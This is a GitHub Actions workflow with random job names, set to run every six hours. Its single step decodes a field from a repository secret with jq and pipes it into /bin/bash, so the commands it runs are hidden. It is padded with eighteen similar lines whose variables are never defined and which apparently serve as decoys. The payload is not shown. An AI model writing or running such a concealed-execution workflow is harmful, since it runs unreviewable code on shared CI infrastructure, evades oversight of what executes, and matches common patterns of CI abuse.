name: baixiaochu5678

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: baixiaochu5678
        env:
          ir1: ${{ secrets.ir1 }}
        run: |
          echo $ir1 | jq -r .h3 | /bin/bash
          echo $anusd1837 | jq -r .e3991 | /bin/bash
          echo $vsvq4 | jq -r .m25 | /bin/bash
          echo $v3643 | jq -r .bca404 | /bin/bash
          echo $xzh7 | jq -r .f82540 | /bin/bash
          echo $ayik10 | jq -r .juyh37886 | /bin/bash
          echo $w7858 | jq -r .sq7111 | /bin/bash
          echo $crqc42 | jq -r .dm9 | /bin/bash
          echo $qce1685 | jq -r .gvw522 | /bin/bash
          echo $n5582 | jq -r .jfb4908 | /bin/bash
          echo $bdhv40442 | jq -r .kuuv5514 | /bin/bash
          echo $xxquw4298 | jq -r .bk59888 | /bin/bash
          echo $sssf74715 | jq -r .gel13 | /bin/bash
          echo $ct5785 | jq -r .jig059 | /bin/bash
          echo $d9 | jq -r .dr42122 | /bin/bash
          echo $jftsn13 | jq -r .a2185 | /bin/bash
          echo $gtuh8 | jq -r .qa6 | /bin/bash
          echo $rw05 | jq -r .quw5 | /bin/bash
          echo $pace78820 | jq -r .y634 | /bin/bash

